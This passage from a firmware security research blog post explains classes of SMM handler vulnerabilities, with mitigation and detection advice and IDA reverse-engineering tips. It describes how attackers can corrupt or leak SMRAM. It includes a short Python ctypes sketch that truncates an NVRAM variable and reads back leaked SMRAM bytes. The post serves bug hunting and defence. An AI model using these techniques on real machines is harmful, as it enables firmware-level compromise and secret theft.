  1. Placing the Comm Buffer in a memory location as close as possible to the base of SMRAM (say SMRAM – 1).
  2. Setting the size of the Comm Buffer to a small enough integer value, say 1 byte.
  3. Triggering the vulnerable SMI. Schematically, the memory layout would look as follows:
Figure 11 – Memory layout at the time of SMI invocation

As far as SmmEntryPoint is concerned, the Comm Buffer is just 1 byte long and does not overlap with SMRAM. Because of that, SmmIsBufferOutsideSmmValid() will succeed and the actual SMI handler will be called. During step 3, the handler will blindly write a QWORD value into the Comm Buffer, and by doing so it will unintentionally write over the lower 7 bytes of SMRAM as well.

Figure 12 – Memory layout at the time of corruption
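
The same arithmetic, spelled out in a few lines of Python (the SMRAM base below is a made-up value; the 8-byte write size comes from the handler above):

SMRAM_BASE = 0x7B000000            # hypothetical TSEG base, for illustration only

comm_buffer_addr = SMRAM_BASE - 1  # step 1: place the buffer just below SMRAM
comm_buffer_size = 1               # step 2: report a 1-byte buffer

# Simplified version of the check done by SmmEntryPoint: the reported
# buffer [addr, addr + size) must not overlap SMRAM -- and it doesn't.
assert comm_buffer_addr + comm_buffer_size <= SMRAM_BASE

# Step 3: the handler blindly writes a QWORD into the buffer...
write_end = comm_buffer_addr + 8
print(hex(write_end - SMRAM_BASE))  # 0x7 -> 7 bytes of SMRAM get overwritten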

Based on EDK2, the bottom portion of TSEG (the de-facto standard location for SMRAM) contains a structure of type SMM_S3_RESUME_STATE whose job is to control recovery from the S3 sleep state. As can be seen below, this structure contains a plethora of members and function pointers whose corruption can benefit the attacker.

Figure 13 – Definition for the SMM_S3_RESUME_STATE object, source: EDK2

Mitigation

To mitigate this class of vulnerabilities, SMI handlers must explicitly check the size of the provided communication buffer and bail out in case the actual size differs from the expected size. This can be achieved in one of two ways:

  1. Dereferencing the provided CommBufferSize argument and then comparing it to the expected size. This method works because we already saw that SmmEntryPoint calls SmmIsBufferOutsideSmmValid(CommBuffer, *CommBufferSize), which guarantees *CommBufferSize bytes of the buffer are located outside of SMRAM.

    Figure 14 – Mitigating low SMRAM corruption can be achieved simply by checking the CommBufferSize argument

  2. Calling SmmIsBufferOutsideSmmValid() on the Comm Buffer again, this time with the concrete size expected by the handler.

Detection

To detect this class of vulnerabilities, we should be looking for SMI handlers that don’t properly check the size of the Comm Buffer. That is, the handler performs neither of the following:

  1. Dereferences the CommBufferSize argument.
  2. Calls SmmIsBufferOutsideSmmValid() on the communication buffer.

Condition 1 is straightforward to check because efiXplorer already takes care of locating SMI handlers and assigning them their correct function prototype. Condition 2 is also easy to validate, but the crux is this: since SmmIsBufferOutsideSmmValid() is statically linked to the code, we must be able to identify it in the compiled binary. Some tips and tricks for doing so can be found in the Identifying Library Functions section.

Arbitrary SMRAM Corruption

Description

While certainly a big step forward in our analysis of SMM vulnerabilities, the previous bug class still suffers from several significant limitations that hinder it from being easily exploited in real-life scenarios. A better, more powerful exploitation primitive will allow us to corrupt arbitrary locations within SMRAM, not only those that are adjacent to the bottom.

Such exploitation primitives can often be found in SMI handlers whose communication buffers contain nested pointers. Since the internal layout of the communication buffer is not known a priori, it is the responsibility of the SMI handler itself to correctly parse and sanitize it, which usually boils down to calling SmmIsBufferOutsideSmmValid() on nested pointers and bailing out if one of them happens to overlap with SMRAM. A textbook example for properly checking these conditions can be found in the SmmLockBox driver from EDK2:

Figure 15 – the sub-handler for SmmLockBoxSave sanitizes nested pointers

To report back to the OS that certain best practices have been implemented in SMM, a modern UEFI firmware usually creates and populates an ACPI table called the Windows SMM Security Mitigations Table, or WSMT for short. Among other things, the WSMT maintains a flag called COMM_BUFFER_NESTED_PTR_PROTECTION that, if present, asserts that no nested pointers are used by SMI handlers without prior sanitization. This table can be dumped and parsed using the chipsec module common.wsmt:

Figure 16 – Using CHIPSEC to dump and parse the contents of the WSMT table

Unfortunately, practice has shown that more often than not, the correlation between reported mitigations and reality is tenuous at best. Even when the WSMT is present and reports all the supported mitigations as active, it’s not uncommon to discover SMM drivers that completely forget to sanitize the communication buffer. Leveraging this, attackers can trigger the vulnerable SMI with a nested pointer pointing into SMRAM. Depending on the nature of the particular handler, this can result in either corruption of the specified address or disclosure of sensitive information read from that address. Let’s take a look at an example.

Figure 17 – An SMI handler that does not sanitize nested pointers, leaving it vulnerable to memory corruption attacks

In the snippet above, we have an SMI handler that gets some arguments via the communication buffer. Based on the decompiled pseudocode, we can deduce that the first byte of the buffer is interpreted as an OpCode field that instructs the handler what it should do next (1). As can be seen (2), valid values for this field are either 0, 2, or 3. If the actual value differs from those, the default clause (3) will be executed. In this clause, an error code is written to the memory location pointed to by the 2nd field of the comm buffer. Since this field, along with the entire contents of the communication buffer, is under the attacker’s control, they can set it up as follows prior to triggering the SMI:

Figure 18 – Contents of the communication buffer that lead to SMRAM corruption

As the handler executes, the value of the OpCode field will force it to fall back into the default clause, while the address field will be selected in advance by the attacker depending on the exact portion of SMRAM they want to corrupt.

Mitigation

To mitigate this class of vulnerabilities, the SMI handler must sanitize any pointer value passed in the communication buffer prior to using it. The pointer validation can be performed in one of two ways:

  • Calling SmmIsBufferOutsideSmmValid(): As was already mentioned, SmmIsBufferOutsideSmmValid() is a utility function provided by EDK2 that checks whether or not a given buffer overlaps with SMRAM. Using it is the recommended way to sanitize external input pointers.
  • Alternatively, some UEFI implementations based on the AMI codebase don’t use SmmIsBufferOutsideSmmValid(), but rather expose similar functionality via a dedicated protocol called AMI_SMM_BUFFER_VALIDATION_PROTOCOL. Besides the semantic differences of calling a function versus utilizing a UEFI protocol, both approaches work roughly the same. Please check out the Identifying Library Functions section to learn how to correctly import this protocol definition into IDA.
    Figure 19 – AMI_SMM_BUFFER_VALIDATION_PROTOCOL in action

Detection

The basic idea to detect this class of vulnerabilities is to look for SMI handlers that don’t call SmmIsBufferOutsideSmmValid() or utilize the equivalent AMI_SMM_BUFFER_VALIDATION_PROTOCOL. However, some edge cases must also be taken into consideration. Failing to do so might introduce unwanted false positives or false negatives.

  1. Calling SmmIsBufferOutsideSmmValid() on the comm buffer itself: this merely guarantees that the comm buffer does not overlap with SMRAM (see Low SMRAM Corruption above), but it says nothing about the nested pointers. As a result, when trying to assess the robustness of a handler against rogue pointer values, these cases should not be taken into consideration.
  2. Not using nested pointers at all: Some SMI handlers might not call SmmIsBufferOutsideSmmValid() simply because the communication buffer does not hold any nested pointers, but rather other data types such as integers, boolean flags, etc. To distinguish this benign case from the vulnerable one, we must be able to figure out the internal layout of the communication buffer.

    While this can be done manually as part of the reverse engineering process, fortunately for us, nowadays automatic type reconstruction is far from being science fiction, and various tools for doing so are readily available as off-the-shelf solutions. The two most prominent and successful IDA plugins in this category are HexRaysPyTools and HexRaysCodeXplorer. Using any of these tools lets you transform raw pointer access notation such as the following:

    Figure 20 – SMI handler using the raw CommBuffer

    Into a more friendly and comprehensible point-to-member notation:

    Figure 21 – SMI handler using the reconstructed CommBuffer

    Even more importantly, these plugins keep track of how individual fields are being accessed. Based on the access pattern, they are fully capable of reconstructing the layout of the containing structure. This includes extrapolating the number of members, their respective sizes, types, attributes, and so on. When applied to the Comm Buffer, this method lets you quickly discover if it holds any nested pointers.

    Figure 22 – The reconstructed CommBuffer as extrapolated by HexRaysCodeXplorer. Notice this structure holds two members which are nested pointers

TOCTOU attacks

Description

Sometimes, even calling SmmIsBufferOutsideSmmValid() on nested pointers is not enough to make an SMI handler fully secure. The reason for this is that SMM was not designed with concurrency in mind and as a result, it suffers from some inherent race conditions, the most prominent one being TOCTOU attacks against the communication buffer. Because the comm buffer itself resides outside of SMRAM, its contents can change while the SMI handler is executing. This fact has serious security implications as it means double-fetches from it won’t necessarily yield the same values.

In an attempt to remedy this, SMM in multiprocessing environments follows what’s known as an “SMI rendezvous”. In a nutshell, once a CPU enters SMM, a dedicated software preamble sends an Inter-Processor Interrupt (IPI) to all other processors in the system. This IPI causes them to enter SMM as well and wait there for the SMI to complete. Only then can the first processor safely call the handler function to actually service the SMI.

This scheme is highly effective in preventing other processors from meddling with the communication buffer while it is being used, but of course, CPUs are not the only entities that have access to the memory bus. As any OS 101 course teaches you, nowadays many hardware devices are capable of acting as DMA agents, meaning they can read/write memory without going through the CPU at all. This is great news performance-wise but terrible news as far as firmware security is concerned.

Figure 23 – DMA-aware hardware can modify the contents of the comm buffer while an SMI is executing, source: Dell Firmware Security

To see how DMA operations can assist exploitation, let’s take a look at the following snippet taken from a real-life SMI handler:

Figure 24 – SMI handler that is vulnerable to a TOCTOU attack

As can be seen, this handler references a nested pointer that we named field_18 in at least 3 different locations:

  1. First, its value is retrieved from the comm buffer and saved into a local variable in SMRAM.
  2. Then, SmmIsBufferOutsideSmmValid() is called on the local variable to make sure it does not overlap SMRAM.
  3. If deemed safe, the nested pointer is re-read from the comm buffer and then passed to CopyMem() as the destination argument.

As was mentioned earlier, nothing guarantees consecutive reads from the comm buffer will necessarily yield the same value. That means an attacker can issue this SMI with the pointer referencing a perfectly safe location outside of SMRAM:

Figure 25 – Initial layout of the communication buffer at the time of issuing the SMI

However, right after the SMI validates the nested pointer and just before it is fetched again, there exists a small window of opportunity in which a DMA attack can modify its value to point somewhere else. Knowing that the pointer will soon be passed to CopyMem(), the attacker could make it point to an address in SMRAM they want to corrupt.

Figure 26 – A malicious DMA device can modify the pointer inside the CommBuffer to point somewhere else, potentially to SMRAM memory

Mitigation

If configured properly by the firmware, SMRAM should be shielded from tampering by DMA devices. To make sure that’s the case on your machine, run the smm_dma module from CHIPSEC.

Figure 27 – Checking that SMRAM is protected from DMA attacks

Because of that, TOCTOU vulnerabilities can be mitigated merely by copying data from the communication buffer into local variables that reside in SMRAM. As always, a good reference for the proper coding style is EDK2:

Figure 28 – Copying data from the comm buffer into local variables in SMRAM, source: SmmLockBox.c

Once all the required pieces of data are copied into SMRAM that way, DMA attacks won’t be able to influence the execution flow of SMI handlers:

Figure 29 – If configured properly, SMRAM should be protected from tampering by DMA devices

Detection

Detecting TOCTOU vulnerabilities in SMI handlers requires reconstructing the internal layout of the communication buffer, then counting how many times each field is being fetched. If the same field is being fetched twice or more by the same execution flow, chances are the respective handler is susceptible to such attacks. The severity of these issues greatly depends on the types of individual fields, with pointer fields being the most acute ones. Again, properly reconstructing the structure of the Comm Buffer greatly helps in assessing the potential risk.

CSEG-only Aware Handlers

Description

As was mentioned in previous posts in the series, the de-facto standard location for SMRAM memory is the “Top Memory Segment”, often abbreviated as TSEG. Still, on many machines, a separate SMRAM region called CSEG (Compatibility Segment) co-exists with TSEG for compatibility reasons. Unlike TSEG, whose location in physical memory can be programmed by the BIOS, the location of the CSEG region is fixed to the address range 0xA0000-0xBFFFF. Some legacy SMI handlers were designed with only CSEG in mind, a fact that can be abused by attackers. Below is an example of one such handler:

Figure 30 – An SMI handler with some CSEG-specific protections

Unlike the handlers we reviewed so far, this SMI handler does not get its arguments via the communication buffer. Instead, it uses the EFI_SMM_CPU_PROTOCOL to read registers from the SMM save state, created automatically by the CPU upon entering SMM. Therefore, the potential attack surface in this example is not the communication buffer, but rather the general-purpose registers of the CPU, whose values can be set almost arbitrarily prior to issuing the SMI.

The handler goes as follows:

  1. First, it reads the values of the ES and EBX registers from the save state.
  2. Then, it computes a linear address from them using the formula: 16 * ES + (EBX & 0xFFFF).
  3. Finally, it checks that the computed address does not fall within the bounds of CSEG. If the address is considered safe, it is passed as an argument to the function at 0x3020.

Note that the handler essentially re-implements common utility functions such as SmmIsBufferOutsideSmmValid(), only it does so in a poor way that completely neglects SMRAM segments other than CSEG. Theoretically, attackers can set the ES and BX registers such that the computed linear address points to some other SMRAM region such as TSEG while still passing the safety checks imposed by the handler.

In practice, however, chances are this vulnerability is not realistically exploitable. The reason for this is that the maximal linear address we can reach is limited to 16 * 0xFFFF + 0xFFFF == 0x10FFEF, and experience shows that TSEG is usually located at much higher addresses. Nevertheless, it is a good thing to be aware of such handlers and the danger they pose.

Mitigation

Mitigating these vulnerabilities is entirely up to the developers of the SMI handler.

Detection

A good strategy to pinpoint these cases is to look for SMI handlers that make use of “magic numbers” that reference some unique characteristics of CSEG. These include immediate values such as 0xA0000 (the physical base address of CSEG), 0x1FFFF (its size minus one), and 0xBFFFF (its last addressable byte). Based on our experience, a function that uses two or more of these values is likely to have some CSEG-specific behavior and must be examined carefully to assess its potential risk.
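
As a rough illustration, this strategy can be expressed with the same Bip/Hex-Rays primitives used elsewhere in this series. The sketch below is ours, and the threshold of two constants is a heuristic choice rather than a hard rule:

CSEG_MAGICS = {0xA0000, 0x1FFFF, 0xBFFFF}

def uses_cseg_magics(f: BipFunction, threshold=2):
    found = set()

    def inspect_number(node: CNodeExprNum):
        # Collect every CSEG-related constant that appears in the pseudocode.
        if node.value in CSEG_MAGICS:
            found.add(node.value)

    # Visit every numeric literal in the decompiled function.
    f.hxcfunc.visit_cnode_filterlist(inspect_number, [CNodeExprNum])
    return len(found) >= threshold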

SetVariable() Information Disclosure

Description

All the bug classes described so far were centered around hijacking the SMM execution flow and corrupting SMM memory. Yet another very important category of vulnerabilities revolves around disclosing the contents of SMRAM. It is a known fact that SMRAM cannot be read from outside of SMM, which is why it is sometimes used by the firmware to store secrets that must be kept hidden from the outside world. In addition to that, disclosing the contents of SMRAM can also help with the exploitation of other vulnerabilities that require accurate knowledge of the memory layout.

A common scenario for SMRAM disclosure happens when SMM code tries to update the contents of an NVRAM variable. In UEFI, updating an NVRAM variable is not an atomic operation, but rather a composite one made out of the following steps:

  1. Allocating a stack buffer that will hold the data associated with the variable.
  2. Using the GetVariable() service to read the contents of the variable into the stack buffer.
  3. Performing all the required modifications on the stack buffer.
  4. Using the SetVariable() service to write the modified stack buffer back to NVRAM.
Figure 31 – UEFI code that demonstrates updating a UEFI variable. Source: TCGSmm

When calling GetVariable(), note that the 4th parameter is used as an input-output argument. Upon entry, this argument signifies the number of bytes the caller is interested in reading, while on return it is set to the number of bytes that were read from NVRAM in practice. In case the actual size of the variable matches the expected one, both values should be the same.

A problem arises when developers implicitly assume the size of a variable to be immutable. Due to this assumption, they completely ignore the number of bytes read by GetVariable() and just pass a hardcoded size to SetVariable() when writing the updated contents:

Figure 32 – the code above implicitly assumes the size of CpuSetup will always be 0x101A, so it doesn’t bother to check the number of bytes actually read by GetVariable()

Since the contents of some NVRAM variables (at least those that have the EFI_VARIABLE_RUNTIME_ACCESS attribute) can be modified from the operating system, they can be abused to trigger information disclosures in SMM while simultaneously serving as the exfiltration channel. Let’s see how this can be done in practice.

First, the attacker would use an OS-provided API function such as SetFirmwareEnvironmentVariable() to truncate the variable, thus making it shorter than expected. Then, they would trigger the vulnerable SMI handler. The SMI handler will:

  1. Allocate the stack-based buffer. Like any other stack-based allocation, this buffer is uninitialized by default, meaning it holds leftovers from previous function calls that took place in SMM.
    Figure 33 – Side-by-side depiction of the NVRAM variable and the stack buffer (phase 1)
  2. Call the GetVariable() service to read the contents of the variable into the stack buffer. Normally, the size of the variable is equal to the size of the stack buffer, but since the attacker just truncated the variable in NVRAM, the buffer is surely longer. This in turn means it will continue to hold some uninitialized bytes even after GetVariable() returns.
    Figure 34 – Side-by-side depiction of the NVRAM variable and the stack buffer (phase 2)
  3. Modify the stack buffer in memory.
    Figure 35 – Side-by-side depiction of the NVRAM variable and the stack buffer (phase 3)
  4. Call the SetVariable() service to write back the modified stack buffer into NVRAM. Because this call is done using the hardcoded, constant size of the stack buffer, it will also write to NVRAM its uninitialized part.
    Figure 36 – Side-by-side depiction of the NVRAM variable and the stack buffer (phase 4)

To complete the process, the attacker can now use an API function such as GetFirmwareEnvironmentVariable() to fully disclose the contents of the variable, including the bytes that originate from the uninitialized portion.
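
From the OS side, the truncate-and-read-back dance can be driven with the Win32 firmware variable APIs. The sketch below is illustrative only: the variable name is borrowed from the example above, the vendor GUID is a placeholder, and the code must run as an administrator holding the SE_SYSTEM_ENVIRONMENT_NAME privilege:

import ctypes

kernel32 = ctypes.windll.kernel32

NAME = "CpuSetup"                                   # variable from the example above
GUID = "{00000000-0000-0000-0000-000000000000}"     # placeholder vendor GUID, not the real one

# Step 1: truncate the variable down to a single byte.
kernel32.SetFirmwareEnvironmentVariableW(NAME, GUID, b"\x00", 1)

# Step 2: trigger the vulnerable SMI handler (platform-specific, omitted here).

# Step 3: read the variable back; its tail now carries leaked SMRAM stack bytes.
buf = ctypes.create_string_buffer(0x101A)
n = kernel32.GetFirmwareEnvironmentVariableW(NAME, GUID, buf, len(buf))
leaked = buf.raw[:n]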

Mitigation

The moral of this story is that NVRAM variables are not to be trusted blindly and should be taken into account when reasoning about the attack surface of the handler. If applicable, use compiler flags such as InitAll to make sure stack buffers will be zero-initialized. More tactically, when updating the contents of NVRAM variables the code must always take into account the actual size of the variable and not rely on a static, pre-computed value.

Yet another possible direction to mitigate these issues is to limit access to NVRAM variables. This can be done either by removing the EFI_VARIABLE_RUNTIME_ACCESS attribute entirely or using a protocol such as EDKII_VARIABLE_LOCK_PROTOCOL to make variables read-only.

Detection

It’s reasonable to assume that an NVRAM variable update operation will take place during the course of one function. That means we can usually ignore scenarios in which one function reads the variable and another one writes it. To locate these functions, after analyzing the input file with efiXplorer, navigate to the “services” tab and search for pairs of calls where GetVariable() is immediately followed by SetVariable():

Figure 37 – Searching for pairs of calls to GetVariable() and SetVariable()

For each such pair of calls, check that:

  1. Both calls originate from the same function
  2. Both calls operate on the same NVRAM variable
  3. The size argument passed to SetVariable() is an immediate value
Figure 38 – Simple heuristics to detect SMRAM info leaks

Identifying Library Functions

This post freely references library functions such as FreePool() and SmmIsBufferOutsideSmmValid() and naively assumes we can locate them without any hassle. The problem is these functions are statically linked to the binary, and normally SMM images are stripped of any debug symbols before being shipped to end-users. Due to that, locating them inside the IDA database is quite challenging.

During our work, we researched multiple approaches to tackle this problem, including automated diffing using Diaphora as well as experimentation with some lesser-known plugins such as rizzo and fingermatch. Eventually, we decided to stick to the KISS principle and perform the matching using plain and simple heuristics that take into consideration some of the unique characteristics of the target function. Below are some rules-of-thumb for matching the functions referenced earlier. Note that we assume the binary was already analyzed by efiXplorer, which makes things a bit easier.

FreePool

Identifying FreePool() is pretty straightforward. All it takes is to scan the IDA database for a function that:

  • Receives one integer argument.
  • Conditionally calls either gBs->FreePool() or gSmst->FreePool() (but never both).
  • Forwards its input argument to whichever of these services it calls.

Figure 39 – Simple heuristic to pinpoint FreePool()

SmmIsBufferOutsideSmmValid

Identification of SmmIsBufferOutsideSmmValid() is a bit trickier. To successfully pull this off, we need to have some background information about a UEFI protocol called EFI_SMM_ACCESS2_PROTOCOL. This protocol is used to manage and query the visibility of SMRAM on the platform. As such, it exposes the respective methods to open, close, and lock SMRAM.

Figure 40 – Interface definition for EFI_SMM_ACCESS2_PROTOCOL, source: Step to UEFI

In addition to those, this protocol also exports a method called GetCapabilities(), which can be used by clients to figure out exactly where SMRAM lives in physical memory.

Figure 41 – Documentation of the GetCapabilities() function, source: Step to UEFI

Upon return, this function fills an array of EFI_SMRAM_DESCRIPTOR structures that tell the caller which regions of SMRAM are available, their size, state, etc.

Figure 42 – Output of a sample program that uses EFI_SMM_ACCESS2_PROTOCOL to query SMRAM ranges, source: Step to UEFI

In EDK2, the common practice is to store these EFI_SMRAM_DESCRIPTOR structures as global variables so that other functions can easily access them later. As you probably guessed, one of these functions is none other than SmmIsBufferOutsideSmmValid(), which iterates over the descriptor list to decide if the caller-provided buffer is safe:

Figure 43 – Source code for SmmIsBufferOutsideSmmValid, source: SmmMemLib.c

Taking this into consideration, our strategy to identify SmmIsBufferOutsideSmmValid() is that of a reverse lookup – first, we’ll find the global SMRAM descriptors initialized by EFI_SMM_ACCESS2_PROTOCOL and only then, based on the functions that use them, deduce which one is the most promising candidate to be SmmIsBufferOutsideSmmValid().

Technically, one can do so by following these simple steps:

  • Go to the “protocols” tab in efiXplorer and double click EFI_SMM_ACCESS2_PROTOCOL. This will cause IDA to jump to the location where this GUID is utilized (usually the call to LocateProtocol)
    Figure 44 – Searching for EFI_SMM_ACCESS2_PROTOCOL in IDA
  • Click on the protocol’s interface pointer (EfiSmmAccess2Protocol) and hit ‘x’ to search for its xrefs:
    Figure 45 – Listing the cross-references to EfiSmmAccess2Protocol
  • For each call to GetCapabilities(), check if the 3rd parameter (the SMRAM descriptor) is a global variable. If it is, do the following:
    • Hit ‘n’ to rename it according to some naming convention (say, SmramDescriptor_XXX, where XXX is an ordinal) to allow for easy reference in the future
    • Hit ‘y’ and set its variable type to EFI_SMRAM_DESCRIPTOR *

    Figure 46 – Renaming and setting the type for the SMRAM descriptors

  • Now check the following criteria for each function in the database.
    1. The function must receive two integer arguments
    2. The function must return a boolean value. From the perspective of the decompiler, boolean values are just plain integers, so to make this distinction we should go over all the return statements in the function and check that the returned value is a member of the set {0,1}.
    3. The function must reference one of the SMRAM descriptors that were marked in the previous step

If all three conditions are met, chances are the function you’re looking at is actually SmmIsBufferOutsideSmmValid():

Figure 47 – Locating SmmIsBufferOutsideSmmValid() in compiled SMM binaries using simple heuristics
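
If you need to repeat the renaming and retyping step across many descriptors, it can also be scripted. This is a minimal IDAPython sketch under a couple of assumptions: the descriptor addresses have already been collected from the GetCapabilities() xrefs by hand, and the EFI_SMRAM_DESCRIPTOR type is present in the local types (efiXplorer usually loads it):

import idc

# Addresses of the global descriptors found via the GetCapabilities() xrefs above
# (placeholder value -- substitute the ones from your own database).
descriptor_eas = [0x12345678]

for i, ea in enumerate(descriptor_eas):
    idc.set_name(ea, "SmramDescriptor_%d" % i)    # same convention as the manual step
    idc.SetType(ea, "EFI_SMRAM_DESCRIPTOR *")     # requires the type to exist in local types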

AMI_SMM_BUFFER_VALIDATION_PROTOCOL

Currently, efiXplorer does not support the definition of AMI_SMM_BUFFER_VALIDATION_PROTOCOL out of the box, so we must import the protocol definition separately.

Figure 48 – AMI_SMM_BUFFER_VALIDATION is not supported out of the box

To accomplish this, follow these steps:

  1. Download the protocol header file from GitHub and save it locally.
  2. Open an IDAPython prompt and run the following snippet:
    Figure 49 – Defining some C macros to enable importing the protocol header

    This is necessary because the header file makes use of several macros and typedefs that must be #defined manually before importing it.
  3. Navigate to the File->Import C header file menu to import the header.
    Figure 50 – Importing the header file
  4. Run efiXplorer again (hotkey: CTRL+ALT+E) and notice how the decompilation output suddenly changes:
    Figure 51 – AMI_SMM_BUFFER_VALIDATION is now recognized

Conclusion

“The more you look, the more you see.”
– Robert M. Pirsig,  Zen and the Art of Motorcycle Maintenance

Firmware-level attacks seem to pose a significant challenge to the security community. As part of the everlasting cat-and-mouse game between attackers and defenders, threat actors are starting to shift their spotlight to the firmware, considered by many the soft underbelly of the IT stack. In recent years, awareness of firmware threats has been constantly increasing, and some promising approaches are emerging to combat them:

  • Hardware vendors such as Intel are constantly adding more security features to each new line of CPUs. The important advantage of these features is that they’re baked into the hardware and are capable of eliminating certain bug classes from the ground up (or at least making exploitation much harder). The downside of this approach is that due to the fragmented nature of the industry, not every feature that is supported by the hardware gets widespread adoption from the software side. While certain features such as Secure Boot, Boot Guard, and BIOS Guard are highly popular and can be found in the majority of commodity machines, other features such as STM (SMI Transfer Monitor, a technology which was intended to de-privilege SMM) were left as merely a PoC.
  • OS vendors such as Microsoft are collaborating intensely with leading OEMs to help bridge the gap between firmware security and OS security, a mandatory move given their long-term vision of harnessing virtualization to protect every Windows machine. The outcome of these endeavors is the line of Secured-Core PCs, which come preloaded with security features and configurations aimed at narrowing down the firmware attack surface as well as containing the damage in case of an attack.
  • EDR vendors are also doing their part, starting to tap into the firmware and provide visibility into the SPI flash memory and the EFI system partition. This approach is great for spotting IOCs of known firmware implants, but unfortunately it is rather limited when it comes to detecting the underlying vulnerabilities that enabled the infection in the first place.

Even in the face of these advancements, firmware security still bears lots and lots of issues, design flaws, and of course vulnerabilities to uncover. The ability of the security community to successfully pull this off depends on three fundamental pillars: knowledge, tooling, and diligence.

In this blog post, we focused on promoting knowledge by shedding light on unfamiliar territory. In the next post, we’ll cover tooling and reveal:

  • How we automated the bug hunting process to the degree that finding SMM vulnerabilities is merely a matter of running a Python script
  • Some real-life examples of vulnerabilities we found, affecting most well-known OEMs in the industry.

As for diligence, unfortunately, no known recipe exists for producing such human qualities. It is, therefore, the responsibility of each and every one of us to just try our best and make sure that no stone is left unturned in this exciting and challenging domain.

Further Reading
